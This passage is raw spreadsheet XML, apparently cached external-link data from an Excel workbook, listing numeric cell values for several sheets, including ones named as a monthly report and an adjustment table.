      <sheetData sheetId="27">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52110.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>787.04</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>21585.03</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600.04</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>6142.85</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>110</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>5578.45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92</v>
          </cell>
          <cell r="S74">
            <v>653.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>13.6904761904762</v>
          </cell>
          <cell r="V74">
            <v>7.52681860036832</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>217.79347826087</v>
          </cell>
          <cell r="Y74">
            <v>221.756151270014</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="28">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52110.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>867.08</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>20717.95</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583.08</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>5559.77</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>155</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>5423.45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92</v>
          </cell>
          <cell r="S74">
            <v>653.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>13.2183908045977</v>
          </cell>
          <cell r="V74">
            <v>7.50608356290174</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>217.79347826087</v>
          </cell>
          <cell r="Y74">
            <v>221.756151270014</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="29">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50436.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>2177</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>764.57</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>22130.38</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>0</v>
          </cell>
          <cell r="E19">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>1077.58</v>
          </cell>
          <cell r="E20">
            <v>2177</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>454.07</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>7282.7</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>134.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>5288.95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102</v>
          </cell>
          <cell r="S74">
            <v>663.93</v>
          </cell>
          <cell r="T74">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U74">
            <v>14.1666666666667</v>
          </cell>
          <cell r="V74">
            <v>7.59993131868132</v>
          </cell>
          <cell r="W74">
            <v>217.7</v>
          </cell>
          <cell r="X74">
            <v>217.78431372549</v>
          </cell>
          <cell r="Y74">
            <v>221.695058213968</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="30">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48773.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>2200</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>1039.67</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>23290.71</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>0</v>
          </cell>
          <cell r="E19">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>1077.58</v>
          </cell>
          <cell r="E20">
            <v>2200</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>927.17</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>8555.53</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>85.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>5203.45</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="P34">
            <v>0</v>
          </cell>
          <cell r="Q34">
            <v>1585.503</v>
          </cell>
          <cell r="R34">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="E44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="I44">
            <v>0</v>
          </cell>
        </row>
        <row r="54">
          <cell r="L54">
            <v>31083.36</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10</v>
          </cell>
          <cell r="R74">
            <v>112</v>
          </cell>
          <cell r="S74">
            <v>673.93</v>
          </cell>
          <cell r="T74">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U74">
            <v>15.0537634408602</v>
          </cell>
          <cell r="V74">
            <v>7.69326484018265</v>
          </cell>
          <cell r="W74">
            <v>220</v>
          </cell>
          <cell r="X74">
            <v>217.982142857143</v>
          </cell>
          <cell r="Y74">
            <v>221.669906370098</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="31">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48773.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>23290.71</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8555.53</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>5203.45</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="P34">
            <v>0</v>
          </cell>
          <cell r="Q34">
            <v>1585.503</v>
          </cell>
          <cell r="R34">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="E44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="I44">
            <v>0</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112</v>
          </cell>
          <cell r="S74">
            <v>673.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>15.0537634408602</v>
          </cell>
          <cell r="V74">
            <v>7.69326484018265</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>217.982142857143</v>
          </cell>
          <cell r="Y74">
            <v>221.669906370098</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="32">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>0</v>
          </cell>
          <cell r="Q8">
            <v>0</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="D14">
            <v>0</v>
          </cell>
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="L14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="L15">
            <v>48773.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>23290.71</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>0</v>
          </cell>
          <cell r="E19">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>1077.58</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>8555.53</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>5203.45</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="P34">
            <v>0</v>
          </cell>
          <cell r="Q34">
            <v>1585.503</v>
          </cell>
          <cell r="R34">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="E44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="I44">
            <v>0</v>
          </cell>
        </row>
        <row r="54">
          <cell r="L54">
            <v>31083.36</v>
          </cell>
        </row>
        <row r="55">
          <cell r="E55">
            <v>0</v>
          </cell>
        </row>
        <row r="55">
          <cell r="I55">
            <v>0</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71">
            <v>0</v>
          </cell>
          <cell r="R71">
            <v>0</v>
          </cell>
          <cell r="S71">
            <v>0</v>
          </cell>
          <cell r="T71">
            <v>0</v>
          </cell>
          <cell r="U71">
            <v>0</v>
          </cell>
          <cell r="V71">
            <v>0</v>
          </cell>
          <cell r="W71">
            <v>0</v>
          </cell>
          <cell r="X71">
            <v>0</v>
          </cell>
          <cell r="Y71">
            <v>0</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>0</v>
          </cell>
          <cell r="R72">
            <v>0</v>
          </cell>
          <cell r="S72">
            <v>0</v>
          </cell>
          <cell r="T72">
            <v>0</v>
          </cell>
          <cell r="U72">
            <v>0</v>
          </cell>
          <cell r="V72">
            <v>0</v>
          </cell>
          <cell r="W72">
            <v>0</v>
          </cell>
          <cell r="X72">
            <v>0</v>
          </cell>
          <cell r="Y72">
            <v>0</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74">
            <v>0</v>
          </cell>
          <cell r="R74">
            <v>112</v>
          </cell>
          <cell r="S74">
            <v>673.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>15.0537634408602</v>
          </cell>
          <cell r="V74">
            <v>7.69326484018265</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>217.982142857143</v>
          </cell>
          <cell r="Y74">
            <v>221.669906370098</v>
          </cell>
        </row>
      </sheetData>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0"/>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月报"/>
      <sheetName val="调整表"/>
      <sheetName val="Sheet1"/>
    </sheetNames>
    <sheetDataSet>
      <sheetData sheetId="0"/>
      <sheetData sheetId="1">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4885.218</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>100161.22500005</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>5087</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5187.95</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>48751.7339999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>416.7</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>5987.62</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>682</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>633.11</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>12343.31</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>2708</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>2932.44</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>22634.972</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>691</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>462</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>5501.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>268.38</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>233.508</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3286.24600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>1107.886</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>0</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>1e-6</v>
          </cell>
          <cell r="S72">
            <v>0.000342</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.25373134328358e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.09356725146199e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>1e-6</v>
          </cell>
          <cell r="S73">
            <v>5781.730342</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V73">
            <v>71.9120689303483</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>1e-5</v>
          </cell>
          <cell r="Y73">
            <v>239.299858028557</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>0</v>
          </cell>
          <cell r="R76">
            <v>0</v>
          </cell>
          <cell r="S76">
            <v>3.3e-9</v>
          </cell>
          <cell r="T76">
            <v>0</v>
          </cell>
          <cell r="U76">
            <v>0</v>
          </cell>
          <cell r="V76">
            <v>4.1044776119403e-11</v>
          </cell>
          <cell r="W76" t="e">
            <v>#DIV/0!</v>
          </cell>
          <cell r="X76" t="e">
            <v>#DIV/0!</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="V77">
            <v>62.9330845771159</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>16.0830555555556</v>
          </cell>
          <cell r="R79">
            <v>16.0830555555556</v>
          </cell>
          <cell r="S79">
            <v>3653.64194444444</v>
          </cell>
          <cell r="T79">
            <v>67.0127314814815</v>
          </cell>
          <cell r="U79">
            <v>67.0127314814815</v>
          </cell>
          <cell r="V79">
            <v>45.4433077667219</v>
          </cell>
          <cell r="W79">
            <v>105.514775730151</v>
          </cell>
          <cell r="X79">
            <v>105.514775730151</v>
          </cell>
          <cell r="Y79">
            <v>102.274389686212</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>8</v>
          </cell>
          <cell r="R80">
            <v>8</v>
          </cell>
          <cell r="S80">
            <v>2612.85583333333</v>
          </cell>
          <cell r="T80">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U80">
            <v>33.3333333333333</v>
          </cell>
          <cell r="V80">
            <v>32.4982068822554</v>
          </cell>
          <cell r="W80">
            <v>85.25</v>
          </cell>
          <cell r="X80">
            <v>85.25</v>
          </cell>
          <cell r="Y80">
            <v>79.1463491256534</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>10.2497222222222</v>
          </cell>
          <cell r="R81">
            <v>10.2497222222222</v>
          </cell>
          <cell r="S81">
            <v>2906.01305555556</v>
          </cell>
          <cell r="T81">
            <v>42.7071759259259</v>
          </cell>
          <cell r="U81">
            <v>42.7071759259259</v>
          </cell>
          <cell r="V81">
            <v>36.144440989497</v>
          </cell>
          <cell r="W81">
            <v>264.202281904659</v>
          </cell>
          <cell r="X81">
            <v>264.202281904659</v>
          </cell>
          <cell r="Y81">
            <v>275.640193174172</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="2">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3521.253</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>96639.9720000502</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>4715</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>7392.73</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>46074.0039999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>244.74</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>5742.88</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>656</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>775.9</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>12223.41</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>2714</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>4822.17</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>20526.802</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>670</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>4831.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>335.48</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>191</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3430.72600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>0</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>2e-6</v>
          </cell>
          <cell r="S72">
            <v>0.000343</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.25347222222222e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.09620991253644e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>2e-6</v>
          </cell>
          <cell r="S73">
            <v>5781.730343</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V73">
            <v>71.6980449280754</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>1e-5</v>
          </cell>
          <cell r="Y73">
            <v>239.299857987168</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>1e-11</v>
          </cell>
          <cell r="S76">
            <v>3.31e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>2.08333333333333e-11</v>
          </cell>
          <cell r="V76">
            <v>4.1046626984127e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>2.08333333333333e-11</v>
          </cell>
          <cell r="V77">
            <v>62.7457837301602</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>13.5</v>
          </cell>
          <cell r="R79">
            <v>29.5830555555556</v>
          </cell>
          <cell r="S79">
            <v>3667.14194444444</v>
          </cell>
          <cell r="T79">
            <v>56.25</v>
          </cell>
          <cell r="U79">
            <v>61.6313657407407</v>
          </cell>
          <cell r="V79">
            <v>45.4754705412257</v>
          </cell>
          <cell r="W79">
            <v>99.6296296296296</v>
          </cell>
          <cell r="X79">
            <v>102.829134545864</v>
          </cell>
          <cell r="Y79">
            <v>102.264653422575</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>8</v>
          </cell>
          <cell r="R80">
            <v>16</v>
          </cell>
          <cell r="S80">
            <v>2620.85583333333</v>
          </cell>
          <cell r="T80">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U80">
            <v>33.3333333333333</v>
          </cell>
          <cell r="V80">
            <v>32.5006923776455</v>
          </cell>
          <cell r="W80">
            <v>82</v>
          </cell>
          <cell r="X80">
            <v>83.625</v>
          </cell>
          <cell r="Y80">
            <v>79.1550597180883</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>9.5</v>
          </cell>
          <cell r="R81">
            <v>19.7497222222222</v>
          </cell>
          <cell r="S81">
            <v>2915.51305555556</v>
          </cell>
          <cell r="T81">
            <v>39.5833333333333</v>
          </cell>
          <cell r="U81">
            <v>41.1452546296296</v>
          </cell>
          <cell r="V81">
            <v>36.1546757881393</v>
          </cell>
          <cell r="W81">
            <v>285.684210526316</v>
          </cell>
          <cell r="X81">
            <v>274.535506828507</v>
          </cell>
          <cell r="Y81">
            <v>275.67292091815</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="3">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5626.95</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>91013.0220000503</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>5560</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5285.163</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>46348.8409999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>948</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>223.61</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>6467.27</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>839</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>648</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>12414.41</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>2727</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>3016.633</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>20237.169</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>509</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>4322.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
